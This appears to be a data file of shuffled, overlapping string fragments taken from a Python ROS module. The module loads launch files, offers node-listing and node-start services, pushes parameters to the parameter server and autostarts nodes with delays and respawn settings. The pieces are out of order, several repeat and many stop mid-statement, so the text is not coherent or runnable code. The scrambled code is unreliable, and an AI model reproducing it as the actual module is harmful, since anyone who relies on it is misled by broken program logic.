"return False def _get_start_delay(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/delay') try: return float(self.roscfg.params[param_name].value) except:",
"# , ScreenHandlerException class LoadException(Exception): ''' The exception throwing while searching for the",
"Software License Agreement (BSD License) # # Copyright (c) 2012, Fraunhofer FKIE/US, <NAME>",
"distro = rospkg.distro.current_distro_codename() if distro in ['electric', 'diamondback', 'cturtle']: return roslib.rosenv.get_master_uri() else: return",
"rospy.loginfo(\"package: %s\" % self.package) self.do_autostart = rospy.get_param('~autostart', False) rospy.loginfo(\"do_autostart: %s\" % self.do_autostart) self.load_params_at_start",
"= rospy.names.ns_join(node, 'default_cfg/autostart/required/publisher') topic = '' try: topic = self.roscfg.params[param_name].value if rosgraph.names.is_private(topic): rospy.logwarn('Private",
"True start_delay = self._get_start_delay(node) start_required = self._get_start_required(node) if autostart and start_required: start_now =",
"print_function from multimaster_msgs_fkie.msg import Capability from multimaster_msgs_fkie.srv import ListDescription, ListNodes, Task, ListDescriptionResponse, ListNodesResponse",
"package of the node cwd = self.get_ros_home() if not (n.cwd is None): if",
"isinstance(self.argv, list): self.argv = [\"%s\" % self.argv] sys.argv.extend(self.argv) if self.do_autostart: rospy.set_param('~autostart', False) #",
"roslib.packages.find_resource(package, launch_file) if len(paths) > 0: # if more then one launch file",
"remap[1])) # masteruri = self.masteruri # if n.machine_name and not n.machine_name == 'localhost':",
"'_package:=', '_launch_file:='] result = [] for a in argv: in_filter = False for",
"= os.path.dirname(cmd[0]) respawn = [''] if n.respawn: respawn = self._get_node('node_manager_fkie', 'respawn') # set",
"launch_file = path # if package is set, try to find the launch",
"''' Callback for the ROS service to get the list with available nodes.",
"traceback print(traceback.format_exc()) import roslib.rosenv return roslib.rosenv.get_ros_home() @classmethod def _load_parameters(cls, masteruri, params, clear_params): \"\"\"",
"rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) except: import traceback print(traceback.format_exc()) def getPath(self, path, package=''): ''' Searches",
"try: if self.runService is None: self.runService = rospy.Service('~run', Task, self.rosservice_start_node) if self.listService is",
"''' # Load the launch file # ''' # try: # self.__lock.acquire() #",
"grouping the nodes. @return: the capabilities description stored in this configuration @rtype: C{dict(machine",
"Exceutables:\\n%s' % str(cmd)) def _run_node(self, cmd, cwd, env, node, autostart=False): self._pending_starts.add(node) start_now =",
"None for item in self.roscfg.nodes: itemname = rospy.names.ns_join(item.namespace, item.name) if itemname == node:",
"= rospy.get_param('~autostart', False) rospy.loginfo(\"do_autostart: %s\" % self.do_autostart) self.load_params_at_start = rospy.get_param('~load_params_at_start', True) self.parameter_loaded =",
"-> ignore\", param) else: for entry in p.value: try: print(entry[0], rospy.get_param('/mastername', '')) if",
"COPYRIGHT HOLDERS AND CONTRIBUTORS # \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES,",
"ImportError: import xmlrpc.client as xmlrpclib param_server = xmlrpclib.ServerProxy(masteruri) p = None try: #",
"self.listService = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) except: import traceback print(traceback.format_exc()) def getPath(self, path, package=''):",
"self.do_autostart = rospy.get_param('~autostart', False) rospy.loginfo(\"do_autostart: %s\" % self.do_autostart) self.load_params_at_start = rospy.get_param('~load_params_at_start', True) self.parameter_loaded",
"'' for param, p in self.roscfg.params.items(): if param.endswith('robots'): if isinstance(p.value, list): if len(p.value)",
"% self.package) self.do_autostart = rospy.get_param('~autostart', False) rospy.loginfo(\"do_autostart: %s\" % self.do_autostart) self.load_params_at_start = rospy.get_param('~load_params_at_start',",
"item.name)) else: self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) # get the robot description self.description_response = dr =",
"the view if delay_service_creation > 0.: t = threading.Timer(delay_service_creation, self._timed_service_creation) t.start() else: self._timed_service_creation()",
"True) # if self.nodes: # self.runService = rospy.Service('~run', Task, self.rosservice_start_node) # self.listServic =",
"self.parameter_loaded: self.loadParams() n = None for item in self.roscfg.nodes: itemname = rospy.names.ns_join(item.namespace, item.name)",
"package containing the launch file or an empty string, if the C{file} is",
"Feed) and decode the string entry from system default coding to unicode. @param",
"self._decode(entry[4]) break except: pass # get the sensor description tmp_cap_dict = self.getCapabilitiesDesrc() for",
"'nodes' : [str]))))} ''' result = dict() capabilies_descr = dict() if self.roscfg is",
"try to find the launch file in the given package if package: paths",
"TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # ANY WAY OUT OF THE",
"namespace self.sensors = {} # sensor descriptions launch_path = self.getPath(self.launch_file, self.package) rospy.loginfo(\"loading launch",
"'type', 'images', 'description'] -> ignore\", param) else: for entry in p.value: capabilies_descr[entry[0]] =",
"is ignored!' % topic) topic = '' elif not rosgraph.names.is_global(topic): topic = rospy.names.ns_join(rosgraph.names.namespace(node),",
"PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT OWNER OR",
"xmlrpclib.ServerProxy(masteruri) p = None try: # multi-call style xmlrpc param_server_multi = xmlrpclib.MultiCall(param_server) #",
"> 0: n.env_args.append(('RESPAWN_DELAY', '%d' % respawn_params['delay'])) node_cmd = [respawn[0], prefix, cmd[0]] cmd_args =",
"try: result[machine_name][ns][p.value] = {'type': capabilies_descr[p.value]['type'], 'images': capabilies_descr[p.value]['images'], 'description': capabilies_descr[p.value]['description'], 'nodes': []} except: result[machine_name][ns][p.value]",
"r: if code != 1: raise StartException(\"Failed to set parameter: %s\" % (msg))",
"0: n.env_args.append(('RESPAWN_MAX', '%d' % respawn_params['max'])) if respawn_params['min_runtime'] > 0: n.env_args.append(('RESPAWN_MIN_RUNTIME', '%d' % respawn_params['min_runtime']))",
"nodes self._pending_starts = set() self._pending_starts_last_printed = set() def _filter_args(self, argv): afilter = ['__ns:=',",
"# get published topics from ROS master master = rosgraph.masterapi.Master(self.masteruri) for topic, datatype",
"loops, to create the description list first for param, p in self.roscfg.params.items(): if",
"if isinstance(cmd, string_types): cmd = [cmd] if cmd is None or len(cmd) ==",
"tmp_cap_dict = self.getCapabilitiesDesrc() for machine, ns_dict in tmp_cap_dict.items(): if machine in self.roscfg.machines: machine",
"== rospy.get_param('/mastername', ''): dr.robot_name = self._decode(entry[2]) dr.robot_type = entry[1] dr.robot_images = entry[3].split(',') dr.robot_descr",
"rospy.get_param('/mastername', '')) if not entry[0] or entry[0] == rospy.get_param('/mastername', ''): dr.robot_name = self._decode(entry[2])",
"INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,",
"try: import xmlrpclib except ImportError: import xmlrpc.client as xmlrpclib param_server = xmlrpclib.ServerProxy(masteruri) p",
"node, autostart=False): self._pending_starts.add(node) start_now = True start_delay = self._get_start_delay(node) start_required = self._get_start_required(node) if",
"cap_ns = roslib.names.namespace(cap_ns).rstrip(roslib.names.SEP) if not cap_ns: cap_ns = roslib.names.SEP cap_param = roslib.names.ns_join(cap_ns, 'capability_group')",
"start_timer = threading.Timer(start_delay, self._run_node, args=(cmd, cwd, env, node, False)) start_timer.start() if start_now: ps",
"val): ''' Replaces the '\\\\n' by LF (Line Feed) and decode the string",
"= self._get_start_delay(node) start_required = self._get_start_required(node) if autostart and start_required: start_now = False #",
"TODO: env-loader support? # if machine.env_args: # env[len(env):] = machine.env_args # nm.screen().testScreen() cmd",
"'')) if not entry[0] or entry[0] == rospy.get_param('/mastername', ''): dr.robot_name = self._decode(entry[2]) dr.robot_type",
"robot description self.description_response = dr = ListDescriptionResponse() dr.robot_name = '' dr.robot_type = ''",
"autostarts if self._pending_starts_last_printed != self._pending_starts: self._pending_starts_last_printed.clear() self._pending_starts_last_printed.update(self._pending_starts) rospy.loginfo(\"Pending autostarts %d: %s\", len(self._pending_starts), self._pending_starts)",
"item in self.roscfg.nodes: if item.machine_name and not item.machine_name == 'localhost': machine = self.roscfg.machines[item.machine_name]",
"p = None try: # multi-call style xmlrpc param_server_multi = xmlrpclib.MultiCall(param_server) # clear",
"param_name = rospy.names.ns_join(node, 'default_cfg/autostart/delay') try: return float(self.roscfg.params[param_name].value) except: pass return 0. def _get_start_required(self,",
"# print 'runNode: ', cmd_args popen_cmd = shlex.split(str(' '.join(cmd_args))) rospy.loginfo(\"run node '%s as':",
"in a or in_filter: continue result.append(a) return result def load(self, delay_service_creation=0.): ''' Load",
"try: result['max'] = int(self.roscfg.params[respawn_max].value) except: pass try: result['min_runtime'] = int(self.roscfg.params[respawn_min_runtime].value) except: pass try:",
"in p.value: try: print(entry[0], rospy.get_param('/mastername', '')) if not entry[0] or entry[0] == rospy.get_param('/mastername',",
"if len(p.value) > 0 and len(p.value[0]) != 5: print(\"WRONG format, expected: ['host(ROS master",
"and use in source and binary forms, with or without # modification, are",
"global environment to empty namespace os.environ[ROS_NAMESPACE] = rospy.names.SEP rospy.set_param('~argv_used', list(set(argv))) loader.load(launch_path, self.roscfg, verbose=False,",
"self.roscfg.nodes: node_fullname = roslib.names.ns_join(item.namespace, item.name) machine_name = item.machine_name if item.machine_name is not None",
"the package of the node cwd = self.get_ros_home() if not (n.cwd is None):",
"self.masteruri = self._masteruri_from_ros() self.roscfg = ROSLaunchConfig() loader = XmlLoader() argv = self._filter_args(sys.argv) #",
"the file name of the launch file @type path: C{str} @param package: the",
"self.loadParams() # initialize the ROS services # HACK to let the node_manager to",
"the given file is not found ''' launch_file = path # if package",
"find the launch file in the given package if package: paths = roslib.packages.find_resource(package,",
"ROS parameter server if self.load_params_at_start: self.loadParams() # initialize the ROS services # HACK",
"['name', 'type', 'images', 'description'] -> ignore\", param) else: for entry in p.value: capabilies_descr[entry[0]]",
"threading.Timer(start_delay, self._run_node, args=(cmd, cwd, env, node, False)) start_timer.start() if start_now: ps = subprocess.Popen(cmd,",
"the node_manager to update the view if delay_service_creation > 0.: t = threading.Timer(delay_service_creation,",
"THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. from",
"skip autostart rospy.loginfo(\"%s is in exclude list, skip autostart\", n.name) return # env",
"ARISING IN # ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN",
"the name of Fraunhofer nor the names of its # contributors may be",
"False # get published topics from ROS master master = rosgraph.masterapi.Master(self.masteruri) for topic,",
"the launch file in the given package if package: paths = roslib.packages.find_resource(package, launch_file)",
"% self.argv] sys.argv.extend(self.argv) if self.do_autostart: rospy.set_param('~autostart', False) # initialize the ROS services #",
"self.rosservice_description) self.runService = None '''@ivar: The service will be created on each load",
"return roslib.rosenv.get_master_uri() def _timed_service_creation(self): with self.__lock: try: if self.runService is None: self.runService =",
"req): # ''' # Load the launch file # ''' # try: #",
"result = {'max': 0, 'min_runtime': 0, 'delay': 0} respawn_max = rospy.names.ns_join(node, 'respawn/max') respawn_min_runtime",
"break if ':=' not in a or in_filter: continue result.append(a) return result def",
"in group_dict.items(): if descr_dict['nodes']: cap = Capability() cap.namespace = ns cap.name = group",
"self.argv = rospy.get_param('~argv', []) rospy.loginfo(\"argv: %s\" % self.argv) if not isinstance(self.argv, list): self.argv",
"\"\"\" try: import xmlrpclib except ImportError: import xmlrpc.client as xmlrpclib param_server = xmlrpclib.ServerProxy(masteruri)",
"'description': self._decode(entry[3])} # get the capability nodes for item in self.roscfg.nodes: node_fullname =",
"ROS service to start a node. ''' self.runNode(req.node) return [] def rosservice_reload(self, req):",
"new_env[k] = v # the ROS_NAMESPACE environment is used in cpp plugins in",
"file with the same name found in the package, the first one will",
"of its # contributors may be used to endorse or promote products derived",
"rospkg.get_ros_home() except: import traceback print(traceback.format_exc()) import roslib.rosenv return roslib.rosenv.get_ros_home() @classmethod def _load_parameters(cls, masteruri,",
"cap_param = roslib.names.ns_join(cap_ns, 'capability_group') if cap_ns == node_fullname: cap_ns = item.namespace.rstrip(roslib.names.SEP) # if",
"self.roscfg.params and cap_param.count(roslib.names.SEP) > 1: cap_ns = roslib.names.namespace(cap_ns).rstrip(roslib.names.SEP) if not cap_ns: cap_ns =",
"dict(namespace: dict(group:dict('type' : str, 'description' : str, 'nodes' : [str]))))} ''' result =",
"True def runNode(self, node, autostart=False): ''' Start the node with given name from",
"%s\"%(msg)) # multi-call objects are not reusable param_server_multi = xmlrpclib.MultiCall(param_server) for p in",
"clear parameter: %s\"%(msg)) # multi-call objects are not reusable param_server_multi = xmlrpclib.MultiCall(param_server) for",
"OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER",
"'cturtle']: import roslib.rosenv return roslib.rosenv.get_ros_home() else: import rospkg return rospkg.get_ros_home() except: import traceback",
"in the package, the first one will be tacked. @param path: the file",
"roslib.rosenv.get_master_uri() else: return rosgraph.rosenv.get_master_uri() except: return roslib.rosenv.get_master_uri() def _timed_service_creation(self): with self.__lock: try: if",
"= node_fullname # find the capability group parameter in namespace while cap_param not",
"self._reload_service = rospy.Service('~reload', std_srvs.srv.Empty, self.rosservice_reload) rospy.Service('~description', ListDescription, self.rosservice_description) self.runService = None '''@ivar: The",
"caller about a new configuration. ''' self.description_response = ListDescriptionResponse() # variables to print",
"'\\\\n' by LF (Line Feed) and decode the string entry from system default",
"in result: result[machine_name] = dict() for (ns, groups) in result[machine_name].items(): if ns ==",
"ListNodesResponse(self.nodes) def rosservice_start_node(self, req): ''' Callback for the ROS service to start a",
"package [%s] not found!' % (path, package)) def rosservice_list_nodes(self, req): ''' Callback for",
"for (ns, groups) in result[machine_name].items(): if ns == cap_ns and p.value in groups:",
"pass try: result['min_runtime'] = int(self.roscfg.params[respawn_min_runtime].value) except: pass try: result['delay'] = int(self.roscfg.params[respawn_delay].value) except: pass",
"None: self.runService = rospy.Service('~run', Task, self.rosservice_start_node) if self.listService is None: self.listService = rospy.Service('~list_nodes',",
"> 1: cap_ns = roslib.names.namespace(cap_ns).rstrip(roslib.names.SEP) if not cap_ns: cap_ns = roslib.names.SEP cap_param =",
"in_filter: continue result.append(a) return result def load(self, delay_service_creation=0.): ''' Load the launch file",
"_get_start_exclude(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/exclude') try: return bool(self.roscfg.params[param_name].value) except: pass return False",
"return self.description_response def loadParams(self): ''' Loads all parameter into ROS parameter server. '''",
"notice, this list of conditions and the following # disclaimer in the documentation",
"OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # ANY WAY OUT OF",
"LoadLaunch from rosgraph.rosenv import ROS_NAMESPACE from roslaunch import ROSLaunchConfig, XmlLoader import os import",
"# create the list with node names for item in self.roscfg.nodes: if item.machine_name",
"cap.description = descr_dict['description'] cap.nodes = list(descr_dict['nodes']) dr.capabilities.append(cap) # load parameters into the ROS",
"not in result[machine_name]: result[machine_name][ns] = dict() if p.value not in result[machine_name][ns]: try: result[machine_name][ns][p.value]",
"None and not item.machine_name == 'localhost' else '' added = False cap_param =",
"try: for k in ['BASH_ENV', 'ENV']: del new_env[k] except: pass # add node",
"p in clear_params: param_server_multi.deleteParam(rospy.get_name(), p) r = param_server_multi() # for code, msg, _",
"@return: the decoded string @rtype: C{unicode} or original on error ''' result =",
"pass return result def get_ros_home(self): ''' Returns the ROS HOME path depending on",
"in the namespace of the node if ns not in result[machine_name]: result[machine_name][ns] =",
"Redistributions of source code must retain the above copyright # notice, this list",
"NEGLIGENCE OR OTHERWISE) ARISING IN # ANY WAY OUT OF THE USE OF",
"_masteruri_from_ros(self): ''' Returns the master URI depending on ROS distribution API. @return: ROS",
"launch_path) self.masteruri = self._masteruri_from_ros() self.roscfg = ROSLaunchConfig() loader = XmlLoader() argv = self._filter_args(sys.argv)",
"except: pass return False def _get_start_delay(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/delay') try: return",
"item.machine_name is not None and not item.machine_name == 'localhost' else '' added =",
"throwing while run a node containing in the loaded configuration. ''' pass class",
"'defunct' processes thread = threading.Thread(target=ps.wait) thread.setDaemon(True) thread.start() # remove from pending autostarts try:",
"cmd, cwd, env, node, autostart=False): self._pending_starts.add(node) start_now = True start_delay = self._get_start_delay(node) start_required",
"= entry[3].split(',') dr.robot_descr = self._decode(entry[4]) break except: pass # get the sensor description",
"in exclude list, skip autostart\", n.name) return # env = n.env_args prefix =",
"n.namespace, '__name:=%s' % n.name] if not (n.cwd is None): args.append('__cwd:=%s' % n.cwd) #",
"@return: the absolute path of the launch file @rtype: C{str} @raise LoadException: if",
"for the ROS service to start a node. ''' self.runNode(req.node) return [] def",
"launchfile info local namespace sys.argv = list(argv) # set the global environment to",
"distro in ['electric', 'diamondback', 'cturtle']: import roslib.rosenv return roslib.rosenv.get_ros_home() else: import rospkg return",
"the global environment to empty namespace os.environ[ROS_NAMESPACE] = rospy.names.SEP rospy.set_param('~argv_used', list(set(argv))) loader.load(launch_path, self.roscfg,",
"package is given, try first to find the launch file in the given",
"not self.parameter_loaded: self.loadParams() n = None for item in self.roscfg.nodes: itemname = rospy.names.ns_join(item.namespace,",
"= roslib.packages.find_node(pkg, filename) except roslib.packages.ROSPkgException as e: # multiple nodes, invalid package raise",
"pass try: result['delay'] = int(self.roscfg.params[respawn_delay].value) except: pass return result def get_ros_home(self): ''' Returns",
"args # print 'runNode: ', cmd_args popen_cmd = shlex.split(str(' '.join(cmd_args))) rospy.loginfo(\"run node '%s",
"SUCH DAMAGE. from __future__ import print_function from multimaster_msgs_fkie.msg import Capability from multimaster_msgs_fkie.srv import",
"'' try: topic = self.roscfg.params[param_name].value if rosgraph.names.is_private(topic): rospy.logwarn('Private for autostart required topic `%s`",
"will be created on each load of a launch file to inform the",
"for machine, ns_dict in tmp_cap_dict.items(): if machine in self.roscfg.machines: machine = self.roscfg.machines[machine].address if",
"while cap_param not in self.roscfg.params and cap_param.count(roslib.names.SEP) > 1: cap_ns = roslib.names.namespace(cap_ns).rstrip(roslib.names.SEP) if",
"def _load_parameters(cls, masteruri, params, clear_params): \"\"\" Load parameters onto the parameter server \"\"\"",
"[ScreenHandler.getSceenCmd(node)] cmd_args[len(cmd_args):] = node_cmd cmd_args.append(n.args) cmd_args[len(cmd_args):] = args # print 'runNode: ', cmd_args",
"% (remap[0], remap[1])) # masteruri = self.masteruri # if n.machine_name and not n.machine_name",
"not self.parameter_loaded: self.loadParams() for n in self.nodes: try: self.runNode(n, self.do_autostart) except Exception as",
"AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR",
"the name of nodes with namespace self.sensors = {} # sensor descriptions launch_path",
"rosgraph.names import roslib.names import roslib.network import rospy import shlex import std_srvs.srv import subprocess",
"roslib.names.SEP cap_param = roslib.names.ns_join(cap_ns, 'capability_group') if cap_ns == node_fullname: cap_ns = item.namespace.rstrip(roslib.names.SEP) #",
"env-loader support? # if machine.env_args: # env[len(env):] = machine.env_args # nm.screen().testScreen() cmd =",
"'images': [], 'description': '', 'nodes': []} result[machine_name][ns][p.value]['nodes'].append(node_fullname) return result def _masteruri_from_ros(self): ''' Returns",
"# if the parameter group parameter found, assign node to the group if",
"> 0: n.env_args.append(('RESPAWN_MIN_RUNTIME', '%d' % respawn_params['min_runtime'])) if respawn_params['delay'] > 0: n.env_args.append(('RESPAWN_DELAY', '%d' %",
"DefaultCfg(object): def __init__(self): self.nodes = [] '''@ivar: the list with names of nodes",
"param_server_multi.setParam(rospy.get_name(), p.key, p.value) r = param_server_multi() for code, msg, _ in r: if",
"as system default @type val: str @return: the decoded string @rtype: C{unicode} or",
"[str]))))} ''' result = dict() capabilies_descr = dict() if self.roscfg is not None:",
"copyright notice, this list of conditions and the following # disclaimer in the",
"# # Copyright (c) 2012, Fraunhofer FKIE/US, <NAME> # All rights reserved. #",
"result = [] for a in argv: in_filter = False for f in",
"C{str} @raise StartException: if an error occurred while start. ''' if not self.parameter_loaded:",
"%s\" % self.argv) if not isinstance(self.argv, list): self.argv = [\"%s\" % self.argv] sys.argv.extend(self.argv)",
"= roslib.names.SEP # if the 'capability_group' parameter found, assign node to the group",
"the ROS service to get the list with available nodes. ''' return ListNodesResponse(self.nodes)",
"', cmd_args popen_cmd = shlex.split(str(' '.join(cmd_args))) rospy.loginfo(\"run node '%s as': %s\", node, str('",
"% (filename, pkg)) return cmd def _get_start_exclude(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/exclude') try:",
"ROS distribution API. @return: ROS master URI @rtype: C{str} ''' try: import rospkg.distro",
"TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR",
"one will be tacked. @param path: the file name of the launch file",
"if delay_service_creation > 0.: t = threading.Timer(delay_service_creation, self._timed_service_creation) t.start() else: self._timed_service_creation() # self.timer",
"and os.path.exists(launch_file): return launch_file raise LoadException('File %s in package [%s] not found!' %",
"group parameter in namespace while cap_param not in self.roscfg.params and cap_param.count(roslib.names.SEP) > 1:",
"if not added: ns = cap_ns # add new group in the namespace",
"xmlrpclib.MultiCall(param_server) for p in params.itervalues(): # suppressing this as it causes too much",
"in source and binary forms, with or without # modification, are permitted provided",
"self.parameter_loaded = False rospy.loginfo(\"load_params_at_start: %s\" % self.load_params_at_start) self.argv = rospy.get_param('~argv', []) rospy.loginfo(\"argv: %s\"",
"not n.machine_name == 'localhost': # machine = self.roscfg.machines[n.machine_name] # TODO: env-loader support? #",
"description list first for param, p in self.roscfg.params.items(): if param.endswith('capabilities'): if isinstance(p.value, list):",
"rospy.get_param('~launch_file', '') rospy.loginfo(\"launch_file: %s\" % self.launch_file) self.package = rospy.get_param('~package', '') rospy.loginfo(\"package: %s\" %",
"r = param_server_multi() for code, msg, _ in r: if code != 1:",
"# clear specified parameter namespaces # #2468 unify clear params to prevent error",
"entry[1] dr.robot_images = entry[3].split(',') dr.robot_descr = self._decode(entry[4]) break except: pass # get the",
"pending autostart nodes self._pending_starts = set() self._pending_starts_last_printed = set() def _filter_args(self, argv): afilter",
"= '' for param, p in self.roscfg.params.items(): if param.endswith('robots'): if isinstance(p.value, list): if",
"'respawn/delay') try: result['max'] = int(self.roscfg.params[respawn_max].value) except: pass try: result['min_runtime'] = int(self.roscfg.params[respawn_min_runtime].value) except: pass",
"or in_filter: continue result.append(a) return result def load(self, delay_service_creation=0.): ''' Load the launch",
"!= 1: # raise StartException(\"Failed to clear parameter: %s\"%(msg)) # multi-call objects are",
"def _get_start_required(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/required/publisher') topic = '' try: topic =",
"self.do_autostart) except Exception as e: rospy.logwarn(\"Error while start %s: %s\", n, e) self.do_autostart",
"path, package=''): ''' Searches for a launch file. If package is given, try",
"into ROS parameter server. ''' params = dict() for param, value in self.roscfg.params.items():",
"THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE ARE",
"if ':=' not in a or in_filter: continue result.append(a) return result def load(self,",
"= dr = ListDescriptionResponse() dr.robot_name = '' dr.robot_type = '' dr.robot_descr = ''",
"multimaster_msgs_fkie.msg import Capability from multimaster_msgs_fkie.srv import ListDescription, ListNodes, Task, ListDescriptionResponse, ListNodesResponse # ,",
"the group if not cap_ns: cap_ns = roslib.names.SEP # if the 'capability_group' parameter",
"''' # try: # self.__lock.acquire() # self.load(req.package, req.file, req.argv) # finally: # self.__lock.release()",
"xmlrpc param_server_multi = xmlrpclib.MultiCall(param_server) # clear specified parameter namespaces # #2468 unify clear",
"!= self._pending_starts: self._pending_starts_last_printed.clear() self._pending_starts_last_printed.update(self._pending_starts) rospy.loginfo(\"Pending autostarts %d: %s\", len(self._pending_starts), self._pending_starts) def _get_node(self, pkg,",
"the given launch file. ''' pass class StartException(Exception): ''' The exception throwing while",
"first one launch_file = paths[0] if os.path.isfile(launch_file) and os.path.exists(launch_file): return launch_file raise LoadException('File",
"'respawn/min_runtime') respawn_delay = rospy.names.ns_join(node, 'respawn/delay') try: result['max'] = int(self.roscfg.params[respawn_max].value) except: pass try: result['min_runtime']",
"def __init__(self): self.nodes = [] '''@ivar: the list with names of nodes with",
"except: result[machine_name][ns][p.value] = {'type': '', 'images': [], 'description': '', 'nodes': []} result[machine_name][ns][p.value]['nodes'].append(node_fullname) return",
"tmp_cap_dict.items(): if machine in self.roscfg.machines: machine = self.roscfg.machines[machine].address if not machine or roslib.network.is_local_address(machine):",
"param_server_multi() for code, msg, _ in r: if code != 1: raise StartException(\"Failed",
"'respawn/max') respawn_min_runtime = rospy.names.ns_join(node, 'respawn/min_runtime') respawn_delay = rospy.names.ns_join(node, 'respawn/delay') try: result['max'] = int(self.roscfg.params[respawn_max].value)",
"avoid load the launchfile info local namespace sys.argv = list(argv) # set the",
"rosservice_description(self, req): ''' Returns the current description. ''' return self.description_response def loadParams(self): '''",
"rospy.names.SEP rospy.set_param('~argv_used', list(set(argv))) loader.load(launch_path, self.roscfg, verbose=False, argv=argv) # create the list with node",
"thread = threading.Thread(target=ps.wait) thread.setDaemon(True) thread.start() # remove from pending autostarts try: self._pending_starts.remove(node) except:",
"if not start_now: # Start the timer for waiting for the topic start_timer",
"= ListDescriptionResponse() # variables to print the pending autostart nodes self._pending_starts = set()",
"# wait for process to avoid 'defunct' processes thread = threading.Thread(target=ps.wait) thread.setDaemon(True) thread.start()",
"result['max'] = int(self.roscfg.params[respawn_max].value) except: pass try: result['min_runtime'] = int(self.roscfg.params[respawn_min_runtime].value) except: pass try: result['delay']",
"for k, v in n.env_args: new_env[k] = v # the ROS_NAMESPACE environment is",
"in self.roscfg.nodes: if item.machine_name and not item.machine_name == 'localhost': machine = self.roscfg.machines[item.machine_name] if",
"pass return result def getCapabilitiesDesrc(self): ''' Parses the launch file for C{capabilities} and",
"# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS",
"name of the launch file @type path: C{str} @param package: the package containing",
"as tupel of (type, name, text) ''' self.package = '' self.file = ''",
"group_dict in ns_dict.items(): for group, descr_dict in group_dict.items(): if descr_dict['nodes']: cap = Capability()",
"for delayed start start_timer = threading.Timer(start_delay, self._run_node, args=(cmd, cwd, env, node, False)) start_timer.start()",
"IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO,",
"skip autostart\", n.name) return # env = n.env_args prefix = n.launch_prefix if n.launch_prefix",
"cap_ns == node_fullname: cap_ns = item.namespace.rstrip(roslib.names.SEP) # if the parameter group parameter found,",
"import types string_types = types.StringTypes else: string_types = (str,) if isinstance(cmd, string_types): cmd",
"as e: raise StartException(str(e)) # handle different result types str or array of",
"== 'localhost' else '' added = False cap_param = roslib.names.ns_join(node_fullname, 'capability_group') cap_ns =",
"{} # sensor descriptions launch_path = self.getPath(self.launch_file, self.package) rospy.loginfo(\"loading launch file: %s\", launch_path)",
"parameter found, assign node to the group if not cap_ns: cap_ns = roslib.names.SEP",
"clear_params): \"\"\" Load parameters onto the parameter server \"\"\" try: import xmlrpclib except",
"and self._get_start_exclude(rospy.names.ns_join(n.namespace, n.name)): # skip autostart rospy.loginfo(\"%s is in exclude list, skip autostart\",",
"= '' dr.robot_descr = '' for param, p in self.roscfg.params.items(): if param.endswith('robots'): if",
"self.__lock = threading.RLock() # Load parameter self.launch_file = rospy.get_param('~launch_file', '') rospy.loginfo(\"launch_file: %s\" %",
"dict() capabilies_descr = dict() if self.roscfg is not None: # get the capabilities",
"initialize the ROS services # rospy.Service('~load', LoadLaunch, self.rosservice_load_launch) self._reload_service = rospy.Service('~reload', std_srvs.srv.Empty, self.rosservice_reload)",
"path, Default: the package of the node cwd = self.get_ros_home() if not (n.cwd",
"# modification, are permitted provided that the following conditions # are met: #",
"configuration. @param node: the name of the node @type node: C{str} @raise StartException:",
"= threading.Timer(3., self._run_node, args=(cmd, cwd, env, node, autostart)) start_timer.start() if start_now and autostart",
"namespace from sys.argv to avoid load the launchfile info local namespace sys.argv =",
"StartException(\"Failed to set parameter: %s\" % (msg)) except Exception: raise # re-raise as",
"node @type node: C{str} @raise StartException: if an error occurred while start. '''",
"except: import traceback print(traceback.format_exc()) def getPath(self, path, package=''): ''' Searches for a launch",
"isinstance(p.value, list): if len(p.value) > 0 and len(p.value[0]) != 5: print(\"WRONG format, expected:",
"load of a launch file to inform the caller about a new configuration.",
"capability group parameter in namespace while cap_param not in self.roscfg.params and cap_param.count(roslib.names.SEP) >",
"WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING",
"the sensor description tmp_cap_dict = self.getCapabilitiesDesrc() for machine, ns_dict in tmp_cap_dict.items(): if machine",
"types string_types = types.StringTypes else: string_types = (str,) if isinstance(cmd, string_types): cmd =",
"separate loops, to create the description list first for param, p in self.roscfg.params.items():",
"# Load parameter self.launch_file = rospy.get_param('~launch_file', '') rospy.loginfo(\"launch_file: %s\" % self.launch_file) self.package =",
"traceback.format_exc() if self.do_autostart: if not self.parameter_loaded: self.loadParams() for n in self.nodes: try: self.runNode(n,",
"let the node_manager to update the view if delay_service_creation > 0.: t =",
"@return: ROS HOME path @rtype: C{str} ''' try: import rospkg.distro distro = rospkg.distro.current_distro_codename()",
"SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. from __future__",
"ListNodes, self.rosservice_list_nodes) except: import traceback print(traceback.format_exc()) def getPath(self, path, package=''): ''' Searches for",
"if the 'capability_group' parameter found, assign node to the group if cap_param in",
"found!' % (path, package)) def rosservice_list_nodes(self, req): ''' Callback for the ROS service",
"LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)",
"self.rosservice_load_launch) self._reload_service = rospy.Service('~reload', std_srvs.srv.Empty, self.rosservice_reload) rospy.Service('~description', ListDescription, self.rosservice_description) self.runService = None '''@ivar:",
